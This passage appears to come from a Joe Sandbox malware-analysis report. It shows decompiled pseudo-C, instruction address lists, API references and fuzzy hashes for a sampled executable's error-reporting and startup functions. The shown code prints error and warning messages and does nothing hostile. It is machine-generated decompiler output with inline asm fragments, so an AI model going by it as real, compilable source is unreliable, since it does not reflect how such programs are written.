						 *( *(_t226 + 0x2c)) =  *( *(_t226 + 0x2c)) & 0;
						 *((intOrPtr*)(_t226 + 0x3c)) = 0;
						 *((short*)( *((intOrPtr*)(_t226 + 0x38)))) = 0;
					}
				}
				E003E480A(_t226 - 4);
				 *(_t228 - 0x10) = _t162;
				if( *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)) + 4)) <= _t162) {
					L44:
					if( *((intOrPtr*)(_t228 + 0x14)) != _t162) {
						 *((intOrPtr*)(_t226 + 0x124)) =  *((intOrPtr*)(_t226 + 0x124)) + 1;
						asm("adc [eax+0x4], ebx");
						_t170 =  *(_t226 + 0xc4);
						__eflags =  *(_t226 + 0xc4) - _t162;
						if( *(_t226 + 0xc4) != _t162) {
							L003B1F91(_t170);
						}
						_t108 =  *(_t226 + 0xc8);
						__eflags = _t108 - _t162;
						if(_t108 == _t162) {
							L58:
							_t109 = E003E571F();
							goto L59;
						} else {
							fputs( *0x42c1e0,  *_t108);
							_push( *((intOrPtr*)(_t228 + 0x10)));
							E003B211A( *(_t226 + 0xc8));
							E003B1FA0( *(_t226 + 0xc8));
							_t109 = E003E7485( *(_t226 + 0xc8),  *((intOrPtr*)(_t228 + 8)), _t228,  *((intOrPtr*)(_t228 + 0xc)));
							__eflags = _t109 - _t162;
							if(_t109 != _t162) {
								L59:
								 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
								return _t109;
							}
							_t214 =  *((intOrPtr*)(_t228 + 0x14));
							__eflags = _t214 - 1;
							if(_t214 != 1) {
								__eflags = _t214 - 0x8007000e;
								if(_t214 != 0x8007000e) {
									_push( *((intOrPtr*)(L003C3B30())));
									 *(_t228 - 4) = _t162;
									E003B1E40(L003B1FB3( *(_t226 + 0xc8), __eflags),  *((intOrPtr*)(_t228 - 0x24)));
								} else {
									fputs("Can\'t allocate required memory",  *( *(_t226 + 0xc8)));
								}
								E003B1FA0( *(_t226 + 0xc8));
							}
							L003B1F91( *(_t226 + 0xc8));
							goto L58;
						}
					}
					_t183 =  *(_t226 + 0xc4);
					if( *(_t226 + 0xc4) == _t162) {
						goto L58;
					}
					_t109 = E003E6E12(_t183,  *((intOrPtr*)(_t228 + 8)),  *((intOrPtr*)(_t228 + 0xc))); // executed
					if(_t109 != _t162) {
						goto L59;
					}
					E003B1FA0( *(_t226 + 0xc4));
					goto L58;
				} else {
					goto L4;
				}
				do {
					L4:
					_t222 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)))) +  *(_t228 - 0x10) * 4));
					 *((intOrPtr*)(_t228 - 0x14)) = _t222;
					_t223 = _t222 + 0x78;
					_t164 =  *(_t223 + 4);
					if( *((char*)(_t223 + 1)) != 0) {
						_t164 = _t164 | 0x00000020;
					}
					if(_t164 != 0 ||  *((intOrPtr*)(_t223 + 0x1c)) != _t164) {
						_t186 =  *(_t226 + 0xc8);
						if( *(_t226 + 0xc8) != 0) {
							E003B1FA0(_t186);
							if( *(_t228 - 0x10) != 0) {
								E003B210C( *((intOrPtr*)(_t228 - 0x14)) + 0x18);
								E003B1FA0( *(_t226 + 0xc8));
							}
						}
						if(_t164 != 0) {
							_t209 =  *(_t226 + 0xc8);
							if( *(_t226 + 0xc8) != 0) {
								E003E4EF1(_t209, "ERRORS:", _t164);
							}
							 *((intOrPtr*)(_t226 + 0x13c)) =  *((intOrPtr*)(_t226 + 0x13c)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x114)) = 1;
						}
						if( *((intOrPtr*)(_t223 + 0x1c)) != 0) {
							_t167 =  *(_t226 + 0xc8);
							_t248 = _t167;
							if(_t167 != 0) {
								 *((intOrPtr*)(_t228 - 0x18)) =  *((intOrPtr*)(_t223 + 0x18));
								fputs("ERRORS:",  *_t167);
								E003B1FA0(_t167);
								_push( *((intOrPtr*)(_t228 - 0x18)));
								E003B1FA0(L003B1FB3(_t167, _t248));
							}
							 *((intOrPtr*)(_t226 + 0x13c)) =  *((intOrPtr*)(_t226 + 0x13c)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x114)) = 1;
						}
						_t187 =  *(_t226 + 0xc8);
						if( *(_t226 + 0xc8) != 0) {
							E003B1FA0(_t187);
							L003B1F91( *(_t226 + 0xc8));
						}
					}
					_t124 = E003E54BD(_t223);
					_t165 = _t124;
					if(_t165 != 0 ||  *((intOrPtr*)(_t223 + 0x28)) != _t124) {
						_t189 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							E003B1FA0(_t189);
							if( *(_t228 - 0x10) != 0) {
								E003B210C( *((intOrPtr*)(_t228 - 0x14)) + 0x18);
								E003B1FA0( *(_t226 + 0xc4));
							}
						}
						if(_t165 != 0) {
							_t200 =  *(_t226 + 0xc4);
							if( *(_t226 + 0xc4) != 0) {
								E003E4EF1(_t200, "WARNINGS:", _t165);
							}
							 *((intOrPtr*)(_t226 + 0x144)) =  *((intOrPtr*)(_t226 + 0x144)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x115)) = 1;
						}
						if( *((intOrPtr*)(_t223 + 0x28)) != 0) {
							_t166 =  *(_t226 + 0xc4);
							_t260 = _t166;
							if(_t166 != 0) {
								 *((intOrPtr*)(_t228 - 0x18)) =  *((intOrPtr*)(_t223 + 0x24));
								fputs("WARNINGS:",  *_t166);
								E003B1FA0(_t166);
								_push( *((intOrPtr*)(_t228 - 0x18)));
								E003B1FA0(L003B1FB3(_t166, _t260));
							}
							 *((intOrPtr*)(_t226 + 0x144)) =  *((intOrPtr*)(_t226 + 0x144)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x115)) = 1;
						}
						_t190 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							E003B1FA0(_t190);
							if( *((char*)(_t226 + 0x15c)) != 0) {
								L003B1F91( *(_t226 + 0xc4));
							}
						}
					}
					if( *((intOrPtr*)(_t223 + 0xc)) >= 0) {
						_t192 =  *(_t226 + 0xc4);
						_t224 = _t226 + 0xc4;
						_t265 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							_push( *((intOrPtr*)(_t228 - 0x14)));
							E003E5001(_t192,  *((intOrPtr*)(_t228 + 8)), _t265);
							if( *((char*)(_t226 + 0x15c)) != 0) {
								L003B1F91( *_t224);
							}
						}
						 *((char*)(_t226 + 0x115)) = 1;
					}
					 *(_t228 - 0x10) =  *(_t228 - 0x10) + 1;
				} while ( *(_t228 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)) + 4)));
				_t162 = 0;
				goto L44;
			}



















                                                                                                    0x003e511b
                                                                                                    0x003e5125
                                                                                                    0x003e5127
                                                                                                    0x003e5129
                                                                                                    0x003e5130
                                                                                                    0x003e5137
                                                                                                    0x003e5142
                                                                                                    0x003e5144
                                                                                                    0x003e5147
                                                                                                    0x003e514d
                                                                                                    0x003e5150
                                                                                                    0x003e5155
                                                                                                    0x003e5158
                                                                                                    0x003e5158
                                                                                                    0x003e5142
                                                                                                    0x003e515e
                                                                                                    0x003e5166
                                                                                                    0x003e516c
                                                                                                    0x003e53ab
                                                                                                    0x003e53ae
                                                                                                    0x003e53e1
                                                                                                    0x003e53ee
                                                                                                    0x003e53f1
                                                                                                    0x003e53f7
                                                                                                    0x003e53f9
                                                                                                    0x003e53fb
                                                                                                    0x003e53fb
                                                                                                    0x003e5400
                                                                                                    0x003e5406
                                                                                                    0x003e5408
                                                                                                    0x003e54a7
                                                                                                    0x003e54a7
                                                                                                    0x00000000
                                                                                                    0x003e540e
                                                                                                    0x003e541c
                                                                                                    0x003e5420
                                                                                                    0x003e5429
                                                                                                    0x003e5434
                                                                                                    0x003e5445
                                                                                                    0x003e544a
                                                                                                    0x003e544c
                                                                                                    0x003e54ac
                                                                                                    0x003e54b2
                                                                                                    0x003e54ba
                                                                                                    0x003e54ba
                                                                                                    0x003e544e
                                                                                                    0x003e5451
                                                                                                    0x003e5454
                                                                                                    0x003e5456
                                                                                                    0x003e545c
                                                                                                    0x003e5478
                                                                                                    0x003e5480
                                                                                                    0x003e548b
                                                                                                    0x003e545e
                                                                                                    0x003e546b
                                                                                                    0x003e546d
                                                                                                    0x003e5497
                                                                                                    0x003e5497
                                                                                                    0x003e54a2
                                                                                                    0x00000000
                                                                                                    0x003e54a2
                                                                                                    0x003e5408
                                                                                                    0x003e53b0
                                                                                                    0x003e53b8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e53c4
                                                                                                    0x003e53cb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e53d7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e5172
                                                                                                    0x003e5172
                                                                                                    0x003e517a
                                                                                                    0x003e517d
                                                                                                    0x003e5180
                                                                                                    0x003e5187
                                                                                                    0x003e518a
                                                                                                    0x003e518c
                                                                                                    0x003e518c
                                                                                                    0x003e5191
                                                                                                    0x003e519c
                                                                                                    0x003e51a4
                                                                                                    0x003e51a6
                                                                                                    0x003e51af
                                                                                                    0x003e51be
                                                                                                    0x003e51c9
                                                                                                    0x003e51c9
                                                                                                    0x003e51af
                                                                                                    0x003e51d0
                                                                                                    0x003e51d2
                                                                                                    0x003e51da
                                                                                                    0x003e51e2
                                                                                                    0x003e51e2
                                                                                                    0x003e51e7
                                                                                                    0x003e51f4
                                                                                                    0x003e51f8
                                                                                                    0x003e51f8
                                                                                                    0x003e5203
                                                                                                    0x003e5205
                                                                                                    0x003e520b
                                                                                                    0x003e520d
                                                                                                    0x003e5214
                                                                                                    0x003e521c
                                                                                                    0x003e5226
                                                                                                    0x003e522b
                                                                                                    0x003e5237
                                                                                                    0x003e5237
                                                                                                    0x003e523c
                                                                                                    0x003e5249
                                                                                                    0x003e524d
                                                                                                    0x003e524d
                                                                                                    0x003e5254
                                                                                                    0x003e525c
                                                                                                    0x003e525e
                                                                                                    0x003e5269
                                                                                                    0x003e5269
                                                                                                    0x003e525c
                                                                                                    0x003e5270
                                                                                                    0x003e5275
                                                                                                    0x003e5279
                                                                                                    0x003e5284
                                                                                                    0x003e528c
                                                                                                    0x003e528e
                                                                                                    0x003e5297
                                                                                                    0x003e52a6
                                                                                                    0x003e52b1
                                                                                                    0x003e52b1
                                                                                                    0x003e5297
                                                                                                    0x003e52b8
                                                                                                    0x003e52ba
                                                                                                    0x003e52c2
                                                                                                    0x003e52ca
                                                                                                    0x003e52ca
                                                                                                    0x003e52cf
                                                                                                    0x003e52dc
                                                                                                    0x003e52e0
                                                                                                    0x003e52e0
                                                                                                    0x003e52eb
                                                                                                    0x003e52ed
                                                                                                    0x003e52f3
                                                                                                    0x003e52f5
                                                                                                    0x003e52fc
                                                                                                    0x003e5304
                                                                                                    0x003e530e
                                                                                                    0x003e5313
                                                                                                    0x003e531f
                                                                                                    0x003e531f
                                                                                                    0x003e5324
                                                                                                    0x003e5331
                                                                                                    0x003e5335
                                                                                                    0x003e5335
                                                                                                    0x003e533c
                                                                                                    0x003e5344
                                                                                                    0x003e5346
                                                                                                    0x003e5352
                                                                                                    0x003e535a
                                                                                                    0x003e535a
                                                                                                    0x003e5352
                                                                                                    0x003e5344
                                                                                                    0x003e5363
                                                                                                    0x003e5365
                                                                                                    0x003e536b
                                                                                                    0x003e5371
                                                                                                    0x003e5373
                                                                                                    0x003e5375
                                                                                                    0x003e537b
                                                                                                    0x003e5387
                                                                                                    0x003e538b
                                                                                                    0x003e538b
                                                                                                    0x003e5387
                                                                                                    0x003e5390
                                                                                                    0x003e5390
                                                                                                    0x003e5397
                                                                                                    0x003e53a0
                                                                                                    0x003e53a9
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E511B
                                                                                                    • fputs.MSVCRT ref: 003E521C
                                                                                                      • Part of subcall function 003EB5FA: fputs.MSVCRT ref: 003EB663
                                                                                                    • fputs.MSVCRT ref: 003E5304
                                                                                                    • fputs.MSVCRT ref: 003E541C
                                                                                                    • fputs.MSVCRT ref: 003E546B
                                                                                                      • Part of subcall function 003B1F91: fflush.MSVCRT ref: 003B1F93
                                                                                                      • Part of subcall function 003B1FB3: __EH_prolog.LIBCMT ref: 003B1FB8
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog$fflushfree
                                                                                                    • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                                                                                    • API String ID: 1750297421-1898165966
                                                                                                    • Opcode ID: 72a675c66dd0430eb1ac0185c60f61d11d97f962188b6e7501366e893037c582
                                                                                                    • Instruction ID: d46284743a48848bfdcad2096f1b28ffdaf60b25823917d5653b8482816efbd4
                                                                                                    • Opcode Fuzzy Hash: 72a675c66dd0430eb1ac0185c60f61d11d97f962188b6e7501366e893037c582
                                                                                                    • Instruction Fuzzy Hash: 89B18034601B518FDB26EF66C8A1BEAB7B1BF44308F44462DE65A4B6D2CB74AC44CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E5523 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 977 3e5523-3e554f call 41f1b0 EnterCriticalSection 980 3e556c-3e5574 977->980 981 3e5551-3e5556 call 3eb5fa 977->981 983 3e557b-3e5580 980->983 984 3e5576 call 3b1f91 980->984 985 3e555b-3e5569 981->985 987 3e564f-3e5665 983->987 988 3e5586-3e5592 983->988 984->983 985->980 991 3e56fe 987->991 992 3e566b-3e5671 987->992 989 3e55d4-3e55ec 988->989 990 3e5594-3e559a 988->990 993 3e55ee-3e55ff call 3b1fa0 989->993 994 3e5630-3e5638 989->994 990->989 996 3e559c-3e55a8 990->996 995 3e5700-3e5717 LeaveCriticalSection 991->995 992->991 997 3e5677-3e567f 992->997 993->994 1012 3e5601-3e5629 fputs call 3b2201 993->1012 998 3e56f0-3e56fc call 3e571f 994->998 1001 3e563e-3e5644 994->1001 1002 3e55aa 996->1002 1003 3e55b0-3e55be 996->1003 997->998 999 3e5681-3e56a3 call 3b1fa0 fputs 997->999 998->995 1014 3e56b8-3e56d4 call 3c3b30 call 3b1fb3 call 3b1e40 999->1014 1015 3e56a5-3e56b6 fputs 999->1015 1001->998 1008 3e564a 1001->1008 1002->1003 1003->994 1005 3e55c0-3e55d2 fputs 1003->1005 1010 3e562b call 3b1fa0 1005->1010 1013 3e56eb call 3b1f91 1008->1013 1010->994 1012->1010 1013->998 1019 3e56d9-3e56e5 call 3b1fa0 1014->1019 1015->1019 1019->1013
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E003E5523(void* __ecx) {
				void* __edi;
				intOrPtr* _t65;
				intOrPtr _t76;
				struct _IO_FILE** _t91;
				struct _CRITICAL_SECTION* _t97;
				struct _IO_FILE** _t99;
				struct _IO_FILE** _t102;
				void* _t104;
				intOrPtr _t105;
				void* _t107;

				E0041F1B0(E00426044, _t107);
				_t97 = 0x43a878;
				_t104 = __ecx;
				 *(_t107 - 0x10) = 0x43a878;
				EnterCriticalSection(0x43a878);
				 *((intOrPtr*)(_t107 - 4)) = 0;
				if( *((intOrPtr*)(_t104 + 0xb8)) != 0) {
					E003EB5FA(_t104 + 0x14, 0x43a878, 1); // executed
					 *((intOrPtr*)(_t104 + 0x30)) = 0;
					 *((char*)( *((intOrPtr*)(_t104 + 0x2c)))) = 0;
					 *((intOrPtr*)(_t104 + 0x3c)) = 0;
					 *((short*)( *((intOrPtr*)(_t104 + 0x38)))) = 0;
				}
				_t75 =  *(_t104 + 0xc4);
				if( *(_t104 + 0xc4) != 0) {
					L003B1F91(_t75);
				}
				_t76 =  *((intOrPtr*)(_t107 + 8));
				if(_t76 != 0) {
					 *((intOrPtr*)(_t104 + 0x12c)) =  *((intOrPtr*)(_t104 + 0x12c)) + 1;
					asm("adc [eax+0x4], ebx");
					__eflags = _t76 - 0x80004004;
					if(_t76 == 0x80004004) {
						L27:
						_t105 = _t76;
					} else {
						__eflags = _t76 - 0x80070070;
						if(_t76 == 0x80070070) {
							goto L27;
						} else {
							_t99 =  *(_t104 + 0xc8);
							__eflags = _t99;
							if(_t99 != 0) {
								E003B1FA0(_t99);
								fputs( *0x42c1e0,  *_t99);
								__eflags =  *((intOrPtr*)(_t107 + 8)) - 0x8007000e;
								if( *((intOrPtr*)(_t107 + 8)) != 0x8007000e) {
									_push( *((intOrPtr*)(L003C3B30())));
									 *((char*)(_t107 - 4)) = 1;
									E003B1E40(L003B1FB3( *(_t104 + 0xc8), __eflags),  *((intOrPtr*)(_t107 - 0x1c)));
								} else {
									fputs( *0x42c1f4,  *( *(_t104 + 0xc8)));
								}
								E003B1FA0( *(_t104 + 0xc8));
								_t85 =  *(_t104 + 0xc8);
								goto L25;
							}
							goto L26;
						}
					}
				} else {
					if(( *(_t104 + 0x154) |  *(_t104 + 0x158)) != 0 ||  *((intOrPtr*)(_t104 + 0x114)) != 0) {
						 *((intOrPtr*)(_t104 + 0x12c)) =  *((intOrPtr*)(_t104 + 0x12c)) + 1;
						asm("adc [eax+0x4], ebx");
						_t87 =  *(_t104 + 0xc4);
						__eflags =  *(_t104 + 0xc4);
						if( *(_t104 + 0xc4) != 0) {
							E003B1FA0(_t87);
							__eflags =  *(_t104 + 0x154) |  *(_t104 + 0x158);
							if(( *(_t104 + 0x154) |  *(_t104 + 0x158)) != 0) {
								_t101 =  *(_t104 + 0xc4);
								fputs("Sub items Errors: ",  *( *(_t104 + 0xc4)));
								_t91 = E003B2201(_t101,  *(_t104 + 0x154),  *(_t104 + 0x158));
								goto L14;
							}
						}
					} else {
						_t65 = _t104 + 0x134;
						if( *((intOrPtr*)(_t104 + 0x115)) == 0) {
							_t65 = _t104 + 0x11c;
						}
						 *_t65 =  *_t65 + 1;
						asm("adc [eax+0x4], ebx");
						_t102 =  *(_t104 + 0xc4);
						if(_t102 != 0) {
							fputs( *0x42c200,  *_t102); // executed
							_t91 = _t102;
							L14:
							E003B1FA0(_t91);
						}
					}
					_t85 =  *(_t104 + 0xc4);
					if( *(_t104 + 0xc4) != 0 &&  *((intOrPtr*)(_t104 + 0x15c)) != 0) {
						L25:
						L003B1F91(_t85);
					}
					L26:
					_t105 = E003E571F();
					_t97 = 0x43a878;
				}
				LeaveCriticalSection(_t97);
				 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
				return _t105;
			}













                                                                                                    0x003e5528
                                                                                                    0x003e5533
                                                                                                    0x003e5538
                                                                                                    0x003e553b
                                                                                                    0x003e553e
                                                                                                    0x003e554c
                                                                                                    0x003e554f
                                                                                                    0x003e5556
                                                                                                    0x003e555e
                                                                                                    0x003e5561
                                                                                                    0x003e5566
                                                                                                    0x003e5569
                                                                                                    0x003e5569
                                                                                                    0x003e556c
                                                                                                    0x003e5574
                                                                                                    0x003e5576
                                                                                                    0x003e5576
                                                                                                    0x003e557b
                                                                                                    0x003e5580
                                                                                                    0x003e564f
                                                                                                    0x003e565c
                                                                                                    0x003e565f
                                                                                                    0x003e5665
                                                                                                    0x003e56fe
                                                                                                    0x003e56fe
                                                                                                    0x003e566b
                                                                                                    0x003e566b
                                                                                                    0x003e5671
                                                                                                    0x00000000
                                                                                                    0x003e5677
                                                                                                    0x003e5677
                                                                                                    0x003e567d
                                                                                                    0x003e567f
                                                                                                    0x003e5683
                                                                                                    0x003e5696
                                                                                                    0x003e569c
                                                                                                    0x003e56a3
                                                                                                    0x003e56c0
                                                                                                    0x003e56c8
                                                                                                    0x003e56d4
                                                                                                    0x003e56a5
                                                                                                    0x003e56b3
                                                                                                    0x003e56b5
                                                                                                    0x003e56e0
                                                                                                    0x003e56e5
                                                                                                    0x00000000
                                                                                                    0x003e56e5
                                                                                                    0x00000000
                                                                                                    0x003e567f
                                                                                                    0x003e5671
                                                                                                    0x003e5586
                                                                                                    0x003e5592
                                                                                                    0x003e55d4
                                                                                                    0x003e55e1
                                                                                                    0x003e55e4
                                                                                                    0x003e55ea
                                                                                                    0x003e55ec
                                                                                                    0x003e55ee
                                                                                                    0x003e55f9
                                                                                                    0x003e55ff
                                                                                                    0x003e5601
                                                                                                    0x003e560e
                                                                                                    0x003e5629
                                                                                                    0x00000000
                                                                                                    0x003e5629
                                                                                                    0x003e55ff
                                                                                                    0x003e559c
                                                                                                    0x003e55a2
                                                                                                    0x003e55a8
                                                                                                    0x003e55aa
                                                                                                    0x003e55aa
                                                                                                    0x003e55b0
                                                                                                    0x003e55b3
                                                                                                    0x003e55b6
                                                                                                    0x003e55be
                                                                                                    0x003e55c8
                                                                                                    0x003e55d0
                                                                                                    0x003e562b
                                                                                                    0x003e562b
                                                                                                    0x003e562b
                                                                                                    0x003e55be
                                                                                                    0x003e5630
                                                                                                    0x003e5638
                                                                                                    0x003e56eb
                                                                                                    0x003e56eb
                                                                                                    0x003e56eb
                                                                                                    0x003e56f0
                                                                                                    0x003e56f5
                                                                                                    0x003e56f7
                                                                                                    0x003e56f7
                                                                                                    0x003e5701
                                                                                                    0x003e570f
                                                                                                    0x003e5717

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E5528
                                                                                                    • EnterCriticalSection.KERNEL32(0043A878), ref: 003E553E
                                                                                                    • fputs.MSVCRT ref: 003E55C8
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A878), ref: 003E5701
                                                                                                      • Part of subcall function 003EB5FA: fputs.MSVCRT ref: 003EB663
                                                                                                    • fputs.MSVCRT ref: 003E560E
                                                                                                      • Part of subcall function 003B2201: fputs.MSVCRT ref: 003B221E
                                                                                                    • fputs.MSVCRT ref: 003E5696
                                                                                                    • fputs.MSVCRT ref: 003E56B3
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                                                                                    • String ID: Sub items Errors:
                                                                                                    • API String ID: 2670240366-2637271492
                                                                                                    • Opcode ID: 875b8226588c8fb1846492b6c41cd5e36cce2c2fab5593ca55c80660dcb140c6
                                                                                                    • Instruction ID: 3b3f259f50264b8910a05f7cebca535067b1185f496775526c650afd63ee833c
                                                                                                    • Opcode Fuzzy Hash: 875b8226588c8fb1846492b6c41cd5e36cce2c2fab5593ca55c80660dcb140c6
                                                                                                    • Instruction Fuzzy Hash: 7451D331600A50CFCB269F65C895AEAB7E2FF44314F95462EE15B9B6A1CB307C44CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041F5B6 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 63%
                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				int _v32;
				char** _v36;
				int _v40;
				void _v44;
				char** _v48;
				intOrPtr _v52;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t22;
				void _t24;
				int _t31;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr _t47;

				_push(0xffffffff);
				_push(0x42fe58);
				_push(0x41f5b0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_v28 = _t47 - 0x20;
				_v8 = _v8 & 0x00000000;
				__set_app_type(1);
				 *0x440a7c =  *0x440a7c | 0xffffffff;
				 *0x440a80 =  *0x440a80 | 0xffffffff;
				_t18 = __p__fmode();
				_t35 =  *0x43ca3c; // 0x0
				 *_t18 = _t35;
				_t19 = __p__commode();
				_t36 =  *0x43ca38; // 0x0
				 *_t19 = _t36;
				 *0x440a78 = _adjust_fdiv;
				_t22 = E0041F6F9( *_adjust_fdiv);
				_t50 =  *0x43a590;
				if( *0x43a590 == 0) {
					__setusermatherr(E0041F6F6);
				}
				E0041F6E4(_t22);
				_push(0x43a0a4);
				_push(0x43a0a0);
				L0041F6DE();
				_t24 =  *0x43ca34; // 0x0
				_v44 = _t24;
				__getmainargs( &_v32,  &_v48,  &_v36,  *0x43ca30,  &_v44);
				_push(0x43a09c);
				_push(0x43a000);
				L0041F6DE();
				 *(__p___initenv()) = _v36;
				_push(_v36);
				_push(_v48);
				_push(_v32);
				_t31 = L003EB0AE(_t50); // executed
				_v40 = _t31;
				exit(_t31); // executed
				_t32 = _v24;
				_t39 =  *((intOrPtr*)( *_t32));
				_v52 = _t39;
				_push(_t32);
				_push(_t39);
				L0041F6D8();
				return _t32;
			}






















                                                                                                    0x0041f5b9
                                                                                                    0x0041f5bb
                                                                                                    0x0041f5c0
                                                                                                    0x0041f5cb
                                                                                                    0x0041f5cc
                                                                                                    0x0041f5d9
                                                                                                    0x0041f5dc
                                                                                                    0x0041f5e2
                                                                                                    0x0041f5e9
                                                                                                    0x0041f5f0
                                                                                                    0x0041f5f7
                                                                                                    0x0041f5fd
                                                                                                    0x0041f603
                                                                                                    0x0041f605
                                                                                                    0x0041f60b
                                                                                                    0x0041f611
                                                                                                    0x0041f61a
                                                                                                    0x0041f61f
                                                                                                    0x0041f624
                                                                                                    0x0041f62b
                                                                                                    0x0041f632
                                                                                                    0x0041f638
                                                                                                    0x0041f639
                                                                                                    0x0041f63e
                                                                                                    0x0041f643
                                                                                                    0x0041f648
                                                                                                    0x0041f64d
                                                                                                    0x0041f652
                                                                                                    0x0041f66b
                                                                                                    0x0041f671
                                                                                                    0x0041f676
                                                                                                    0x0041f67b
                                                                                                    0x0041f689
                                                                                                    0x0041f68b
                                                                                                    0x0041f68e
                                                                                                    0x0041f691
                                                                                                    0x0041f694
                                                                                                    0x0041f69c
                                                                                                    0x0041f6a0
                                                                                                    0x0041f6a6
                                                                                                    0x0041f6ab
                                                                                                    0x0041f6ad
                                                                                                    0x0041f6b0
                                                                                                    0x0041f6b1
                                                                                                    0x0041f6b2
                                                                                                    0x0041f6b9

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 4012487245-0
                                                                                                    • Opcode ID: cfd1dd42a7a3fb1ba429120e4147887653727ca8174d176d3656e714845faf8d
                                                                                                    • Instruction ID: 2a63ece0abf6ebde223ac31a198083045f374fbbf36d4467c46ecc65ea2d7af3
                                                                                                    • Opcode Fuzzy Hash: cfd1dd42a7a3fb1ba429120e4147887653727ca8174d176d3656e714845faf8d
                                                                                                    • Instruction Fuzzy Hash: B6215E36940209EFDB11DFA5DC49BED7B74FB09320F10022AF512A22A0CB385856CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041F62D Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 55%
                                                                                                    			E0041F62D() {
				void* _t13;
				void _t15;
				int _t22;
				intOrPtr* _t23;
				intOrPtr _t27;
				void* _t30;
				void* _t33;

				__setusermatherr(E0041F6F6);
				E0041F6E4(_t13);
